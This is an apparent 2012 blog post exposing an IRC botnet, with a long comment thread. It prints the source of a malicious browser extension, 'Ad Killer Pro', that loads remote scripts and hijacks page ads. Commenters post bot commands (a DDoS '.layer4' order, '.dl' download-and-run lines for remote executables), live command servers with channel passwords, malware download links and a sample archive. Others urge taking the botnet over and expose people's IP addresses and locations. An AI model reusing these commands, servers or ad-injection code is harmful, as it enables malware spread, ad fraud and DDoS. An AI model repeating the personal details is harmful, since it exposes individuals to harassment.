insomnia.incorporatedhosting.info(Insomnia bot hosted in United Kingdom Ovh Systems)

This botnet is found by our anonymous friend here
all credits go to him for this

Server Port
insomnia.incorporatedhosting.info:5656

Channel:
k6geyzs

Botnet owner:
Digital from HF and friends

Here Lilyjade extension named Ad Killer Pro (found from our anonymous friend)

//New Lilyjade extension
//Named: Ad Killer Pro
//CrosRider #:4995
//Panel: http://nemsmedia.cloudapp.net

//Extension
appAPI.ready(function($) {
@include "http://nemsmedia.cloudapp.net/Scripts/jquery-1.5.1.min.js"
@include "http://nemsmedia.cloudapp.net/GetExtension.js"
@include "http://46.105.227.94/aab.js"

});



//http://nemsmedia.cloudapp.net/GetExtension.js
var htmlsrc = "";
var ROOTSERVER = 'http://nemsmedia.cloudapp.net';
var SRCSCR = '/Extension/GetAds';

function init() { // Load Calls $(document).ready(function() { initWindow(); }); // Check post-load for ready (may need timer later) var s = document.readyState, getLast = function(){ var elms = document.getElementsByTagName('*'); return elms[elms.length - 1]; }; if (s === 'complete'){ initWindow(); } } // Functions     function aURL(fmid) { return ROOTSERVER + SRCSCR + '/' + fmid; } function findFID(w, h, obj) { var fid = 0; try {     if ((w == 300) && (h == 250)) { fid = 1; } else if ((w == 160) && (h == 600)) { fid = 2; } else if ((w == 728) && (h == 90)) { fid = 3; } else if ((w == 336) && (h == 280)) { fid = 4; } else if ((w == 468) && (h == 60)) { fid = 5; } else if ((w == 234) && (h == 60)) { fid = 6; } else if ((w == 120) && (h == 90)) { fid = 7; } else if ((w == 120) && (h == 600)) { fid = 8; } else if ((w == 120) && (h == 240)) { fid = 9; } else if ((w == 250) && (h == 250)) { fid = 10; } else if ((w == 180) && (h == 150)) { fid = 11; } else if ((w == 200) && (h == 200)) { fid = 12; } else if ((w == 125) && (h == 125)) { fid = 13; } else if ((w == 728) && (h == 15)) { fid = 14; } else if ((w == 468) && (h == 15)) { fid = 15; } else if ((w == 180) && (h == 90)) { fid = 16; } else if ((w == 160) && (h == 90)) { fid = 17; } } catch (z) { } finally { return fid; } } function chkAds() { if(document.body.innerHTML == htmlsrc) { return; } htmlsrc = document.body.innerHTML; domid = "fm_sponsor"; /* TODO *    Optimize timers to prevent slow down *     *    Add to: *     Ebay *     Amazon *     Blogger *     Netflix *     Walmart *     Best Buy */     /* ******************* */ /* *** Enumeration *** */ /* ******************* */ // Enumerate iframes $('iframe[ld!="true"]').each( function(i) { try { $(this).attr("ld", "true"); var h = parseInt($(this).attr('height')); var w = parseInt($(this).attr('width')); var fid = 0; fid = findFID(w, h, $(this).attr('id')); // Update iframe if (fid > 0) { $(this).attr('height', h+10).attr('width', w+10).attr('src', aURL(fid)); } } catch (z) { } }); // Enumerate Flash $('object[ld!="true"]').each( function(i) { try { var h = parseInt($(this).attr('height')); var w = parseInt($(this).attr('width')); var fid = 0; fid = findFID(w, h, this); // Update object if (fid > 0) { $(this).replaceWith('



//http://46.105.227.94/aab.js
<style>
    #cf0d {
        position:fixed!important;
        position:absolute;
        top:0;
        top:expression((t=document.documentElement.scrollTop?document.documentElement.scrollTop:document.body.scrollTop)+"px");
        left:0;
        width:100%;
        height:100%;
        background-color:#fff;
        opacity:0.9;
        filter:alpha(opacity=90);
        display:block
    }
    #cf0d p {
        opacity:1;
        filter:none;
        font:bold 16px Verdana, Arial, sans-serif;
        text-align:center;
        margin:20% 0
    }
    #cf0d p a, #cf0d p i {
        font-size:12px
    }
    #cf0d ~ * {
        display:none
    }
</style>
<noscript>
    <i id=cf0d>
        <p>Please enable JavaScript!
            <br>Bitte aktiviere JavaScript!
            <br>S'il vous pla&icirc;t activer JavaScript!
            <br>Por favor,activa el JavaScript!
            <br>
        </p>
    </i>
</noscript>
<script>
    (function (w, u) {
        var d = w.document,
            z = typeof u;

        function cf0d() {
            function c(c, i) {
                var e = d.createElement('i'),
                    b = d.body,
                    s = b.style,
                    l = b.childNodes.length;
                if (typeof i != z) {
                    e.setAttribute('id', i);
                    s.margin = s.padding = 0;
                    s.height = '100%';
                    l = Math.floor(Math.random() * l) + 1
                }
                e.innerHTML = c;
                b.insertBefore(e, b.childNodes[l - 1])
            }
            function g(i, t) {
                return !t ? d.getElementById(i) : d.getElementsByTagName(t)
            };

            function f(v) {
                if (!g('cf0d')) {
                    c('<p>Please disable your ad blocker!<br>Bitte deaktiviere Deinen Werbeblocker!<br>Veuillez d&eacute;sactiver votre bloqueur de publicit&eacute;!<br>Por favor, desactive el bloqueador de anuncios!<br><a href="http://antiblock.org/?d=2.2.2' + '___' + escape(v) + '">antiblock.org</a> <i>v2.2.2</i></p>', 'cf0d')
                }
            };
            (function () {
                var a = ['ad-728x90-top0', 'ad_global_header2', 'adclear', 'adspot-1x4', 'body_728_ad', 'coverADS', 'sb_advert', 'ad', 'ads', 'adsense'],
                    l = a.length,
                    i, s = '',
                    e;
                for (i = 0; i < l; i++) {
                    if (!g(a[i])) {
                        s += '<a id="' + a[i] + '"></a>'
                    }
                }
                c(s);
                l = a.length;
                for (i = 0; i < l; i++) {
                    e = g(a[i]);
                    if (e.offsetParent == null || (w.getComputedStyle ? d.defaultView.getComputedStyle(e, null).getPropertyValue('display') : e.currentStyle.display) == 'none') {
                        return f('#' + a[i])
                    }
                }
            }());
            (function () {
                var t = g(0, 'img'),
                    a = ['/ad_fill.', '/ad_homepage_', '/adpoint.', '/ads/leaderboard.', '/i/ads/ad', '/mint/ads/ad', '_advertisements/', '_btnad_', '_tile_ad_', '/120x600_'],
                    i;
                if (typeof t[0] != z && typeof t[0].src != z) {
                    i = new Image();
                    i.onload = function () {
                        this.onload = z;
                        this.onerror = function () {
                            f(this.src)
                        };
                        this.src = t[0].src + '#' + a.join('')
                    };
                    i.src = t[0].src
                }
            }());
            (function () {
                var o = {
                    'http://pagead2.googlesyndication.com/pagead/show_ads.js': 'google_ad_client',
                    'http://js.adscale.de/getads.js': 'adscale_slot_id',
                    'http://get.mirando.de/mirando.js': 'adPlaceId'
                },
                    S = g(0, 'script'),
                    l = S.length - 1,
                    n, r, i, v, s;
                d.write = null;
                for (i = l; i >= 0; --i) {
                    s = S[i];
                    if (typeof o[s.src] != z) {
                        n = d.createElement('script');
                        n.type = 'text/javascript';
                        n.src = s.src;
                        v = o[s.src];
                        w[v] = u;
                        r = S[0];
                        n.onload = n.onreadystatechange = function () {
                            if (typeof w[v] == z && (!this.readyState || this.readyState === "loaded" || this.readyState === "complete")) {
                                n.onload = n.onreadystatechange = null;
                                r.parentNode.removeChild(n);
                                w[v] = null
                            }
                        };
                        r.parentNode.insertBefore(n, r);
                        setTimeout(function () {
                            if (w[v] !== null) {
                                f(n.src)
                            }
                        }, 2000);
                        break
                    }
                }
            }())
        }
        if (d.addEventListener) {
            w.addEventListener('load', cf0d, false)
        } else {
            w.attachEvent('onload', cf0d)
        }
    })(window);
</script>

Hosting infos:
http://whois.domaintools.com/176.31.208.105

Categories: Uncategorized

22 Comments

Anonymous - May 25, 2012 at 7:42 pm

Got some logs from it. Here is the channel:http://pastebin.com/1CwU6rXB
Notice how everything is being russkilled
Most interesting thing was another lilyjade
Infos here:http://pastebin.com/NMkqqu1k
Notice support for two german ad networks adscale.de and mirando.de has been added.

Also, here are some of the things downloaded by a single bot that was loaded on. I'm suprised their bots last more than a day or two.
http://pastebin.com/QZxpHF6w
https://imgur.com/y1XGV

Synn - May 26, 2012 at 4:49 am

Lovely 🙂

Found this a few minutes before you posted it.

For those looking to take it over, or want to brute for the oper PW, oper UN is Digital

Synn - May 26, 2012 at 4:54 am

* Now talking on #insomnia
* Topic for #insomnia is: eWJ2SnRjaXB5TDdJdXNpL3lidklzOGl2eUsvSXE4bWh5YlRKdE1pL3lMZkp0Y2kveUtuSXRNaXJ5TG5JdE1panliWEl1TWkweUxiSnRNaXV5YlRKcjhtaXlhUEpxc21zeWFySnFjbXZ5YlRJcjhpMHlLdklzc2k0eWJYSXI4aWp5Sy9JcHc9PXw0NjAwODYwMw==
* Topic for #insomnia set by __Digital__ at Fri May 25 07:19:06 2012
.layer4 37.59.238.173 80 200
* You are now known as n{US|XP-64a}askgwi
.stop
.stop
.bk

Anonymous - May 26, 2012 at 5:03 pm

I BET YOU ALL FEEL SPECIAL 🙂 WELL ENJOY THE INFO CAUSE I WONT CHANGE IT 🙂 AND GOOD LUCK GETTING ANYTHING FROM IT 🙂

Pig - May 26, 2012 at 6:59 pm

sorry i was not online that's why posts are shoowing up now lol

Anonymous - May 26, 2012 at 7:49 pm

Lily Jade pastebin is down. Here it is again, with a mirror as well.
http://pastebin.com/ubS6h2Cg
http://hpaste.org/69070

Anonymous - May 26, 2012 at 8:01 pm

hey SYN heres to you 🙂 sense ya were stupid and used your ip 70.134.52.203

Pig - May 26, 2012 at 8:43 pm

i m adding the code to the post so u dont have to re-upload this again
very nice job from you "anonymous" guy lol

Anonymous - May 26, 2012 at 9:03 pm

Thanks. May as well dump these as well.
4thdemo.com:3344 785chelsea #Insomnia
4thdemo.com:5443 alexandre69 #Channel Password
4thdemo.com:6667 r3m0hdemoni #Insomnia r3de07, #Jamie
4thdemo.com:9891 modrica1x1 #MasterBl4ster modricha1x1, #lolba, #Cro4t, #fric
All are seperate irc servers, but hosted on the same server. Some HF hecker selling to skids.
Oh, its DeMoNi
* [DeMoNi] (DeMoNi@hiddenhost-8017995A.w90-7.abo.wanadoo.fr): …
* [DeMoNi] #Jamie #Insomnia
* [DeMoNi] jackirc.network :jackirc
* [DeMoNi] idle 15:11:50, signon: Sat May 26 02:46:16
* [DeMoNi] End of WHOIS list.
* [r3m0h] (R3m0h@r3de): …
* [r3m0h] #Insomnia
* [r3m0h] jackirc.network :jackirc
* [r3m0h] is a Network Administrator
* [r3m0h] is available for help.
* [r3m0h] idle 04:40:05, signon: Sat May 26 13:18:01
* [r3m0h] End of WHOIS list.
Most only have like 10 bots at peak times.

Pig - May 26, 2012 at 9:05 pm

from what i see demoni looks like arab hacker living in france lol he use his real ip

Anonymous - May 27, 2012 at 12:58 am

Haha demoni ^^
".abo.wanadoo."
lols

Synn - May 27, 2012 at 2:40 am

"Anonymous said…
hey SYN heres to you 🙂 sense ya were stupid and used your ip 70.134.52.203"

That's my IP?

🙂 Dynamic IP addy ftw. I saw that you tried to DDoS me.

Router is modified to change my MAC if i get a flood. Took me 15 seconds to "Mitigate" your attack.

Oh, and tell "Kid" that running ddos attacks, and killing 100+ bots is bad for botnets. Def. when you only haz 500 boats 🙁 (trollface.jpg)

Btw, i have your oper password.

Anonymous - June 8, 2012 at 6:22 pm

Someone trying to load a ngrbot net off it, located at 46.166.162.130:1993 #ngrs scrt
File: dl.dropbox.com/s/h19bp0niuc3lt23/ngr.exe
Another insomnia net also installed on it, located at dk1.zapto.org:6667 #bots owner of this is iDDoS@pie69, file is: http://dl.dropbox.com/u/23547833/lmfao.exe
Thanks for keeping all the info the same you dumb fucks. All your exes go straight to virustotal.

Anonymous - June 8, 2012 at 7:41 pm

Also, just posted, .dl https://dl.dropbox.com/u/61771932/BsVapor.exe
Hmm, blackshades. Lets see what the no-ip is. veprex.no-ip.org. Where does that point to? 99.44.92.31. I bet it's a vpn, no lead here. Lets look it up http://whois.domaintools.com/99.44.92.31
What? AT&T Huston internet services?
Vapor (The guy who is really into bitcoins) is a dumb fuck who lives in Huston and hosts shit on his own ip.

Pig - June 8, 2012 at 9:54 pm

i m opening new thread with these 2 nets
keep raping them lol

Anonymous - June 9, 2012 at 3:16 am

Successful i4i
Jun 08 21:44:06 <__Digital__> .j #i4i
#i4i
<__Digital__> .dl http://up2x.com/u/633370693.68b6ce3688_file.exe
<__Digital__> .dl http://up2x.com/u/949765942.unknown.exe iunknownv1.no-ip.info:3102
Jun 08 22:15:31 <__Digital__> .bk

Bonus: can any one guess what server this one came from? It hasn't been posted here, yet…
Jun 08 22:58:27 .ruskill on
Jun 08 22:58:29 .dl http://up2x.com/u/949765942.unknown.exe

Pig - June 9, 2012 at 3:56 pm

they keep using no-ip all time lol
nice work again
if u want to post directly here come on irc.abjects.net channel #security and tell me you nick name(i will add you to posters in the blog)

Anonymous - June 9, 2012 at 4:42 pm

I'm banned
* Cannot join #security (You are banned).
If you can unban Userbased, I would be glad.
Also, I meant to post this weeks ago, but the post must have gotten swallowed
http://www.mediafire.com/?5rggorwl7gi8dwt
Password: virus
Loads of logs and samples. Some ircs as well, though some are down by now.
You can post it if you want to, or just throw the samples in with your next release.

Anonymous - June 18, 2012 at 1:57 am

funny, alot of this information is wrong 😀

Anonymous - June 18, 2012 at 2:00 am

you stupid fucks still aint managed to take it over yet nor will you lmfao all tor ranges have been banned against the server so well enjoy trying lmfao you can keep watching tho it makes me feel oh so special <3

Pig - June 18, 2012 at 12:56 pm

litle noob u really think tor is the only alternative when it comes to expose lamers like u ? lol

Anonymous - June 18, 2012 at 5:40 pm

Then why havent you taken it over yet?

Comments are closed